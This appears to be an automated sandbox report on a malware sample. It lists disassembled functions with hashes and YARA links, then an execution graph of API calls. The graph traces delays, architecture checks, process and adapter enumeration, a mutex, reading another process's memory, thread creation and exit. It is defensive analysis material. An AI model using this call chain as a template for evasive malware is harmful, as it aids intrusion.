                                                                  • Instruction ID: c6b5e30470edff2b0b2efd2ce767fa506f1ecd1d46d977061bbbd9f65110fede
                                                                  • Opcode Fuzzy Hash: c0543086663747fb69594ea547407796e8294431db4b638586f3cd6ff03a3e57
                                                                  • Instruction Fuzzy Hash: B9417971E00218ABCF05EFE0D895ADD7BF5FF18304F208589E846AB295DB75AA15CF90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B3D79E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 00B3D7A5
                                                                  • _swprintf.LIBCMT ref: 00B3D817
                                                                    • Part of subcall function 00B28610: std::_Lockit::_Lockit.LIBCPMT ref: 00B28657
                                                                    • Part of subcall function 00B28610: std::_Lockit::_Lockit.LIBCPMT ref: 00B28679
                                                                    • Part of subcall function 00B28610: std::_Lockit::~_Lockit.LIBCPMT ref: 00B286A1
                                                                    • Part of subcall function 00B28610: std::_Lockit::~_Lockit.LIBCPMT ref: 00B2880E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                  • String ID: %.0Lf
                                                                  • API String ID: 1487807907-1402515088
                                                                  • Opcode ID: 2a805786b71cc5937bf78b2f88ec58fe997e5dbdca2d447dc9cc7125daf803df
                                                                  • Instruction ID: 1f141ba6c9b9b968191479215b33c1f58770884faf0c2a060a521b0265193f76
                                                                  • Opcode Fuzzy Hash: 2a805786b71cc5937bf78b2f88ec58fe997e5dbdca2d447dc9cc7125daf803df
                                                                  • Instruction Fuzzy Hash: 6B418A71E00218ABCF05EFE4EC55ADD7BB5FF08300F204589E849AB295EB74AA15CF90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B41887 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 128COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 00B4188E
                                                                  • _swprintf.LIBCMT ref: 00B41900
                                                                    • Part of subcall function 00B29270: std::_Lockit::_Lockit.LIBCPMT ref: 00B292A0
                                                                    • Part of subcall function 00B29270: std::_Lockit::_Lockit.LIBCPMT ref: 00B292C2
                                                                    • Part of subcall function 00B29270: std::_Lockit::~_Lockit.LIBCPMT ref: 00B292EA
                                                                    • Part of subcall function 00B29270: std::_Lockit::~_Lockit.LIBCPMT ref: 00B29422
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                  • String ID: %.0Lf
                                                                  • API String ID: 1487807907-1402515088
                                                                  • Opcode ID: 0f130c915b2cf208925448421938c3cf83fd9783900869b2b6490a3730fe90e2
                                                                  • Instruction ID: 19ddfbdf0fcd3f76998f4c69850703b70f387ec498015a58ec9c152867f550e2
                                                                  • Opcode Fuzzy Hash: 0f130c915b2cf208925448421938c3cf83fd9783900869b2b6490a3730fe90e2
                                                                  • Instruction Fuzzy Hash: 0B418A71E00308ABCF05EFD4D894ADD7BB5FF08300F208989E816AB295DB759A55DF90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B46059 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00B4607E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: EncodePointer
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 2118026453-2084237596
                                                                  • Opcode ID: 04e5bf2912efbb0a6e219e3f814446417a3ec7797bdaa275ce8c4d78a86a0543
                                                                  • Instruction ID: ad625535717c2db5223aac8f00f82d7cba98e8a387e90fac542d73192b89c1fb
                                                                  • Opcode Fuzzy Hash: 04e5bf2912efbb0a6e219e3f814446417a3ec7797bdaa275ce8c4d78a86a0543
                                                                  • Instruction Fuzzy Hash: AC413771900209EFCF25DF98CC81AAEBBF5EF49304F188199F90877252D7359A51EB52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B3DF8F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3___cftoe
                                                                  • String ID: !%x
                                                                  • API String ID: 855520168-1893981228
                                                                  • Opcode ID: 83ec10e44f23eda15770ce520ccdb93ff213da132bcf5fa3eba91f1d3fb3b733
                                                                  • Instruction ID: 2af841c39bcd24faae1c2dfd2c8d24d0e0cd98fcfb2f106bdd802cc3ed944f73
                                                                  • Opcode Fuzzy Hash: 83ec10e44f23eda15770ce520ccdb93ff213da132bcf5fa3eba91f1d3fb3b733
                                                                  • Instruction Fuzzy Hash: 96314971D0020DABDF04DF94E981AEEB7F6FF08304F20449AF915A7251DB75AA45CB64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B419FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3___cftoe
                                                                  • String ID: !%x
                                                                  • API String ID: 855520168-1893981228
                                                                  • Opcode ID: b4d873e901f66fe8f2ebc07bf0e3417529dc2fd3b33cf0ef8c669abb6179e1d0
                                                                  • Instruction ID: 6fd5fd552f077e7dbfdaf1236804144cb31857a2cda0671c7f3a951733823607
                                                                  • Opcode Fuzzy Hash: b4d873e901f66fe8f2ebc07bf0e3417529dc2fd3b33cf0ef8c669abb6179e1d0
                                                                  • Instruction Fuzzy Hash: 09318A32D1525CAFDF00DF98E881AEEBBF5EF09300F140499F854A7242D7759A85DBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B25F40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00B25F86
                                                                  • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,823FDEC6), ref: 00B25FF6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ConvertFreeLocalString
                                                                  • String ID: Invalid SID
                                                                  • API String ID: 3201929900-130637731
                                                                  • Opcode ID: c50712a36b589c7c3f4cab1af49560719567bd66ee9bc6caf52f61b8266b04ce
                                                                  • Instruction ID: b32b49b08ac2e3f256b5615a0b281dbab1716ab9701a8e17f4beab545406b155
                                                                  • Opcode Fuzzy Hash: c50712a36b589c7c3f4cab1af49560719567bd66ee9bc6caf52f61b8266b04ce
                                                                  • Instruction Fuzzy Hash: 2F21D270A04615DBDB20DF58D815BAFBBF8FF44714F10065DE519A7380DBB96A448BD0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B29070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B2909B
                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00B290FE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                  • String ID: bad locale name
                                                                  • API String ID: 3988782225-1405518554
                                                                  • Opcode ID: 02db0d2898a2bc2763cc3c9daac6749d038be843c840bbc0532ce99e63a31004
                                                                  • Instruction ID: 9ee476defff7f7458dc92e65a07cf21586c4fd7d43850867b75c5040244574f8
                                                                  • Opcode Fuzzy Hash: 02db0d2898a2bc2763cc3c9daac6749d038be843c840bbc0532ce99e63a31004
                                                                  • Instruction Fuzzy Hash: 1C21D270905B84EED721CFA8C90474BBFF4EF19710F108A9DE49997781D3B5A604CBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B2F098 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3_
                                                                  • String ID: false$true
                                                                  • API String ID: 2427045233-2658103896
                                                                  • Opcode ID: ad90d1219858fc89d39df0856e91f21f3218963a204e968d9b320fa62b14c504
                                                                  • Instruction ID: 134ce517dba4ea6b3c3ec831661f0a943aaf5ac2a51a7071bc97bf64f44ccf09
                                                                  • Opcode Fuzzy Hash: ad90d1219858fc89d39df0856e91f21f3218963a204e968d9b320fa62b14c504
                                                                  • Instruction Fuzzy Hash: 2411B271941745AED720EFB4D841B9ABBF4AF05300F14CAAAF4A9DB351EB70E604CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B24070 Relevance: 5.2, APIs: 4, Instructions: 189memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LocalFree.KERNEL32(00000000,00B24261,00B64400,000000FF,823FDEC6,00000000,?,00000000,?,?,?,00B64400,000000FF,?,00B23A75,?), ref: 00B24096
                                                                  • LocalAlloc.KERNEL32(00000040,40000022,823FDEC6,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00B24154
                                                                  • LocalAlloc.KERNEL32(00000040,3FFFFFFF,823FDEC6,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00B24177
                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B24217
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Local$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 2012307162-0
                                                                  • Opcode ID: ef00bf39949ad1fede58cb254e194d2c8a41a79b83e2c45859193df3db915861
                                                                  • Instruction ID: 82632985dadd1d28e1d9d54a231c0f459ff6a87889e80a855bab0d5d76ab3366
                                                                  • Opcode Fuzzy Hash: ef00bf39949ad1fede58cb254e194d2c8a41a79b83e2c45859193df3db915861
                                                                  • Instruction Fuzzy Hash: 1551DF71A102159FDB18CF68D985AAEBBF5FB48300F10466DF829E7780DB34AE50CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B21D80 Relevance: 5.2, APIs: 4, Instructions: 171memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LocalAlloc.KERNEL32(00000040,80000022,00000000,?,00000000), ref: 00B21E01
                                                                  • LocalAlloc.KERNEL32(00000040,7FFFFFFF,00000000,?,00000000), ref: 00B21E21
                                                                  • LocalFree.KERNEL32(7FFFFFFE,?,00000000), ref: 00B21EA7
                                                                  • LocalFree.KERNEL32(00000001,823FDEC6,00000000,00000000,00B63C40,000000FF,?,00000000), ref: 00B21F2D
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Local$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 2012307162-0
                                                                  • Opcode ID: 901a6514de38188316b5df29d87958af4a6b65b86485ed637a82703768509487
                                                                  • Instruction ID: 40c686e218f0c017adc80fd4b6846f3be929ef45d442de9da754c418c77349a1
                                                                  • Opcode Fuzzy Hash: 901a6514de38188316b5df29d87958af4a6b65b86485ed637a82703768509487
                                                                  • Instruction Fuzzy Hash: 475104725042219FC715EF2CEC80A6BB7E8FF58360F110AAEF81AD7690DB30D9008791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Execution Graph

                                                                  Execution Coverage:1.3%
                                                                  Dynamic/Decrypted Code Coverage:98.2%
                                                                  Signature Coverage:3.1%
                                                                  Total number of Nodes:383
                                                                  Total number of Limit Nodes:10
                                                                  execution_graph 50524 180078460 50525 180078498 __GSHandlerCheckCommon 50524->50525 50526 1800784c4 50525->50526 50528 180070210 50525->50528 50529 18007021c 50528->50529 50529->50529 50530 180070253 VirtualAlloc 50529->50530 50531 180070278 50530->50531 50531->50526 50532 1fb3ab73ce4 50535 1fb3ab73cb4 50532->50535 50541 1fb3ab73868 50535->50541 50537 1fb3ab73cbd 50538 1fb3ab73cdb 50537->50538 50539 1fb3ab73ccf 50537->50539 50539->50537 50573 1fb3ab7cb54 NtDelayExecution 50539->50573 50542 1fb3ab73888 50541->50542 50574 1fb3ab76328 50542->50574 50544 1fb3ab7388d 50560 1fb3ab73891 50544->50560 50586 1fb3ab78560 50544->50586 50548 1fb3ab738bc 50549 1fb3ab78820 4 API calls 50548->50549 50548->50560 50550 1fb3ab738d7 50549->50550 50551 1fb3ab738ed GetCurrentProcess IsWow64Process 50550->50551 50550->50560 50552 1fb3ab7391a 50551->50552 50551->50560 50597 1fb3ab768e8 GetAdaptersInfo 50552->50597 50554 1fb3ab7391f 50555 1fb3ab73959 CreateMutexW 50554->50555 50554->50560 50556 1fb3ab73979 GetLastError 50555->50556 50555->50560 50557 1fb3ab7399c GetModuleHandleW 50556->50557 50556->50560 50604 1fb3ab7463c GetModuleHandleW GetCurrentProcessId 50557->50604 50560->50537 50562 1fb3ab739c1 50562->50560 50632 1fb3ab76864 NtAllocateVirtualMemory 50562->50632 50564 1fb3ab739d1 50564->50560 50633 1fb3ab7d134 17 API calls new[] 50564->50633 50566 1fb3ab739e1 50634 1fb3ab7378c 50566->50634 50569 1fb3ab739f9 50699 1fb3ab76250 CreateThread 50569->50699 50572 1fb3ab73a11 50572->50560 50573->50539 50576 1fb3ab76331 50574->50576 50575 1fb3ab76367 50575->50544 50576->50575 50700 1fb3ab7a59c GetProcAddress 50576->50700 50578 1fb3ab76343 50578->50575 50701 1fb3ab79484 GetProcAddress 50578->50701 50580 1fb3ab7634c 50580->50575 50702 1fb3ab7a47c 50580->50702 50584 1fb3ab7635e 50584->50575 50707 1fb3ab7ac50 GetProcAddress 50584->50707 50587 1fb3ab7857e 50586->50587 50588 1fb3ab78590 RtlGetVersion 50587->50588 50589 1fb3ab7859b 50587->50589 50588->50589 50590 1fb3ab785a5 GetVersionExW 50589->50590 50591 1fb3ab738b3 50589->50591 50590->50591 50592 1fb3ab78820 CreateToolhelp32Snapshot 50591->50592 50593 1fb3ab7ae1c 50592->50593 50594 1fb3ab78850 Process32FirstW 50593->50594 50595 1fb3ab7886c Process32NextW 50594->50595 50596 1fb3ab7888a CloseHandle 50594->50596 50595->50595 50595->50596 50596->50548 50598 1fb3ab76921 50597->50598 50599 1fb3ab76945 50597->50599 50600 1fb3ab7ad34 NtAllocateVirtualMemory 50598->50600 50601 1fb3ab76953 50599->50601 50603 1fb3ab77b40 NtFreeVirtualMemory 50599->50603 50602 1fb3ab7692c GetAdaptersInfo 50600->50602 50601->50554 50602->50599 50603->50601 50750 1fb3ab77b80 50604->50750 50608 1fb3ab78560 2 API calls 50623 1fb3ab74690 50608->50623 50609 1fb3ab74743 GetCurrentProcessId 50609->50623 50610 1fb3ab7478d GetCurrentProcessId OpenProcess 50612 1fb3ab747b4 NtQueryInformationProcess 50610->50612 50610->50623 50616 1fb3ab74b27 CloseHandle 50612->50616 50612->50623 50613 1fb3ab74c12 50614 1fb3ab739b1 50613->50614 50615 1fb3ab74c23 50613->50615 50614->50560 50631 1fb3ab76988 NtAllocateVirtualMemory 50614->50631 50761 1fb3ab74c38 CloseHandle NtFreeVirtualMemory 50615->50761 50616->50623 50618 1fb3ab7476b 50618->50610 50760 1fb3ab7841c NtFreeVirtualMemory GetModuleFileNameW NtAllocateVirtualMemory 50618->50760 50619 1fb3ab7482a ReadProcessMemory 50619->50616 50621 1fb3ab74881 ReadProcessMemory 50619->50621 50620 1fb3ab74b3c 50620->50613 50622 1fb3ab7bb2c NtAllocateVirtualMemory 50620->50622 50621->50616 50621->50623 50626 1fb3ab74b71 50622->50626 50623->50608 50623->50609 50623->50610 50623->50616 50623->50618 50623->50619 50623->50620 50624 1fb3ab7ad34 NtAllocateVirtualMemory 50623->50624 50625 1fb3ab74907 WideCharToMultiByte 50624->50625 50630 1fb3ab7496a 50625->50630 50626->50613 50628 1fb3ab77b40 NtFreeVirtualMemory 50626->50628 50627 1fb3ab76298 MultiByteToWideChar NtAllocateVirtualMemory 50627->50630 50628->50613 50629 1fb3ab77b40 NtFreeVirtualMemory 50629->50616 50630->50627 50630->50629 50631->50562 50632->50564 50633->50566 50784 1fb3ab73250 50634->50784 50637 1fb3ab737b3 50637->50569 50643 1fb3ab733ac 50637->50643 50644 1fb3ab730d0 12 API calls 50643->50644 50645 1fb3ab733f7 50644->50645 50646 1fb3ab73404 50645->50646 50647 1fb3ab73250 12 API calls 50645->50647 50646->50569 50648 1fb3ab73410 50647->50648 50648->50646 50649 1fb3ab7bb2c NtAllocateVirtualMemory 50648->50649 50650 1fb3ab73437 50649->50650 50651 1fb3ab76b9c 3 API calls 50650->50651 50652 1fb3ab73446 50651->50652 50653 1fb3ab76b9c 3 API calls 50652->50653 50654 1fb3ab73450 50653->50654 50895 1fb3ab77588 50654->50895 50656 1fb3ab73712 50657 1fb3ab77b40 NtFreeVirtualMemory 50656->50657 50657->50646 50658 1fb3ab7345a 50658->50656 50659 1fb3ab7bb2c NtAllocateVirtualMemory 50658->50659 50660 1fb3ab7347c 50659->50660 50661 1fb3ab76b9c 3 API calls 50660->50661 50662 1fb3ab7348b 50661->50662 50903 1fb3ab77504 50662->50903 50664 1fb3ab7349d 50664->50646 50665 1fb3ab734dd wsprintfW 50664->50665 50666 1fb3ab73597 50665->50666 50667 1fb3ab734fd 50665->50667 50668 1fb3ab735cc wsprintfW 50666->50668 50669 1fb3ab73532 wsprintfW 50667->50669 50670 1fb3ab735f3 50668->50670 50671 1fb3ab7355e 50669->50671 50673 1fb3ab73614 wsprintfW 50670->50673 50672 1fb3ab7357f wsprintfW 50671->50672 50674 1fb3ab7363f 50672->50674 50673->50674 50913 1fb3ab73728 50674->50913 50677 1fb3ab77b40 NtFreeVirtualMemory 50678 1fb3ab73668 50677->50678 50679 1fb3ab77b40 NtFreeVirtualMemory 50678->50679 50680 1fb3ab73672 50679->50680 50681 1fb3ab77b40 NtFreeVirtualMemory 50680->50681 50682 1fb3ab7367f 50681->50682 50920 1fb3ab73c2c 50682->50920 50687 1fb3ab7ad34 NtAllocateVirtualMemory 50688 1fb3ab7369f 50687->50688 50689 1fb3ab73703 ExitProcess 50688->50689 50690 1fb3ab7ba98 3 API calls 50688->50690 50689->50656 50691 1fb3ab736be 50690->50691 50692 1fb3ab736ea 50691->50692 50694 1fb3ab7ba98 3 API calls 50691->50694 50940 1fb3ab7b400 50692->50940 50695 1fb3ab736d8 50694->50695 50697 1fb3ab7ba98 3 API calls 50695->50697 50697->50692 50698 1fb3ab77b40 NtFreeVirtualMemory 50698->50689 50699->50572 50700->50578 50701->50580 50705 1fb3ab7a53f 50702->50705 50703 1fb3ab76355 50703->50575 50706 1fb3ab7904c GetProcAddress 50703->50706 50705->50703 50708 1fb3ab7a350 50705->50708 50706->50584 50707->50575 50720 1fb3ab78a94 50708->50720 50710 1fb3ab7a36d 50710->50705 50711 1fb3ab7a360 50711->50710 50726 1fb3ab7ba98 50711->50726 50713 1fb3ab7a3af 50713->50710 50714 1fb3ab7a3d5 FindFirstFileW 50713->50714 50715 1fb3ab7a413 50714->50715 50718 1fb3ab7a3f5 50714->50718 50730 1fb3ab77b40 50715->50730 50716 1fb3ab7a3fc FindNextFileW 50716->50715 50716->50718 50718->50715 50718->50716 50719 1fb3ab7a44e LoadLibraryW 50718->50719 50719->50715 50733 1fb3ab7ae1c 50720->50733 50723 1fb3ab78abe 50735 1fb3ab7bb2c 50723->50735 50724 1fb3ab78ad4 50724->50711 50727 1fb3ab7bab0 50726->50727 50740 1fb3ab7ba2c 50727->50740 50729 1fb3ab7bad9 50729->50713 50731 1fb3ab77b7b 50730->50731 50732 1fb3ab77b5a NtFreeVirtualMemory 50730->50732 50731->50710 50732->50731 50734 1fb3ab78aaa GetSystemDirectoryW 50733->50734 50734->50723 50734->50724 50738 1fb3ab7ad34 NtAllocateVirtualMemory 50735->50738 50737 1fb3ab7bb54 50737->50724 50739 1fb3ab7ad74 50738->50739 50739->50737 50743 1fb3ab7b058 50740->50743 50742 1fb3ab7ba60 50742->50729 50744 1fb3ab7b06c 50743->50744 50745 1fb3ab7b087 50743->50745 50746 1fb3ab77b40 NtFreeVirtualMemory 50744->50746 50749 1fb3ab7af9c NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 50745->50749 50748 1fb3ab7b079 50746->50748 50748->50742 50749->50748 50762 1fb3ab789d4 50750->50762 50755 1fb3ab78ae0 50756 1fb3ab7ae1c 50755->50756 50757 1fb3ab78afe GetUserNameA 50756->50757 50758 1fb3ab78b12 wsprintfA 50757->50758 50759 1fb3ab78b2b 50757->50759 50758->50759 50759->50623 50760->50618 50761->50614 50763 1fb3ab789f2 50762->50763 50764 1fb3ab78a04 FindFirstVolumeW 50763->50764 50765 1fb3ab77b89 50764->50765 50766 1fb3ab78a25 GetVolumeInformationW FindVolumeClose 50764->50766 50767 1fb3ab78bbc 50765->50767 50766->50765 50768 1fb3ab78be5 50767->50768 50777 1fb3ab78d4c 50768->50777 50771 1fb3ab74684 50771->50755 50772 1fb3ab7ad34 NtAllocateVirtualMemory 50773 1fb3ab78c07 50772->50773 50774 1fb3ab78c35 50773->50774 50782 1fb3ab7b984 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 50773->50782 50776 1fb3ab77b40 NtFreeVirtualMemory 50774->50776 50776->50771 50778 1fb3ab7ad34 NtAllocateVirtualMemory 50777->50778 50779 1fb3ab78d68 50778->50779 50780 1fb3ab78bef 50779->50780 50783 1fb3ab78c4c wsprintfA 50779->50783 50780->50771 50780->50772 50782->50774 50783->50780 50785 1fb3ab789d4 3 API calls 50784->50785 50786 1fb3ab73276 50785->50786 50817 1fb3ab73194 50786->50817 50788 1fb3ab7327e 50798 1fb3ab7328b 50788->50798 50823 1fb3ab730d0 50788->50823 50791 1fb3ab7335c 50792 1fb3ab77b40 NtFreeVirtualMemory 50791->50792 50794 1fb3ab73384 50792->50794 50793 1fb3ab7ba98 3 API calls 50795 1fb3ab73336 50793->50795 50796 1fb3ab77b40 NtFreeVirtualMemory 50794->50796 50794->50798 50795->50791 50797 1fb3ab7ba98 3 API calls 50795->50797 50796->50798 50799 1fb3ab73349 50797->50799 50798->50637 50801 1fb3ab76b9c 50798->50801 50799->50791 50800 1fb3ab7ba98 3 API 